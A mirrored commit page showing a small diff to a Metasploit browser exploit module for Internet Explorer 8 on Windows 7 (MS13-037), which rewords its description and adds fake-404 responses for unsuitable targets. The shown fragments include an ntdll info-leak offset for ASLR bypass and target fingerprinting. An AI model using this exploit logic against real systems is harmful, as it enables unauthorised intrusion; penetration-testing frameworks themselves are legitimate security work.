github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Code Releases Activity

Change description a bit

Browse Source
This commit is contained in:
sinn3r 2015-01-27 12:14:55 -06:00
parent 2dedaee9ca
commit bb9c961847
1 changed files with 10 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
View File

@ -10,17 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::RopDb include Msf::Exploit::RopDb
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "8.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => Rank
#})
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -30,15 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
The vulnerability exists in the handling of the dashstyle.array length for vml The vulnerability exists in the handling of the dashstyle.array length for vml
shapes on the vgx.dll module. shapes on the vgx.dll module.
This module has been built and tested specifically against Windows 7 SP1 with The exploit has been built and tested specifically against Windows 7 SP1 with
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
bypass ASLR, and by default the info leak is used. The ntdll version should be bypass ASLR, and by default the info leak is used. To make sure the leak is
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched successful, the ntdll version should be either v6.1.7601.17514 (the default dll
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001). version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725
(installed after apply MS12-001). If the target doesn't have the version the exploit
wants, it will refuse to attack by sending a fake 404 message (webpage not found).
If you wish to try the JRE6 component instead to bypass ASLR, you can set the If you wish to try the JRE6 component instead to bypass ASLR, you can set the
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
have this particular component, the exploit will refuse the attack. have this particular component, the exploit will also refuse to attack by
sending a 404 message.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -389,6 +381,7 @@ function exploit(){
rescue RuntimeError => e rescue RuntimeError => e
# This one is just a warning, because it's a requirement check so it's not that scary. # This one is just a warning, because it's a requirement check so it's not that scary.
print_warning(e.message) print_warning(e.message)
send_not_found(cli)
return return
end end
@ -421,7 +414,7 @@ function exploit(){
@ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_version = "6.1.7601.17725" # MS12-001
@ntdll_base = leak - 0x47090 @ntdll_base = leak - 0x47090
else else
print_error("ntdll version not detected, sending 404: #{agent}") print_warning("ntdll version not detected, sending 404: #{agent}")
send_not_found(cli) send_not_found(cli)
return return
end end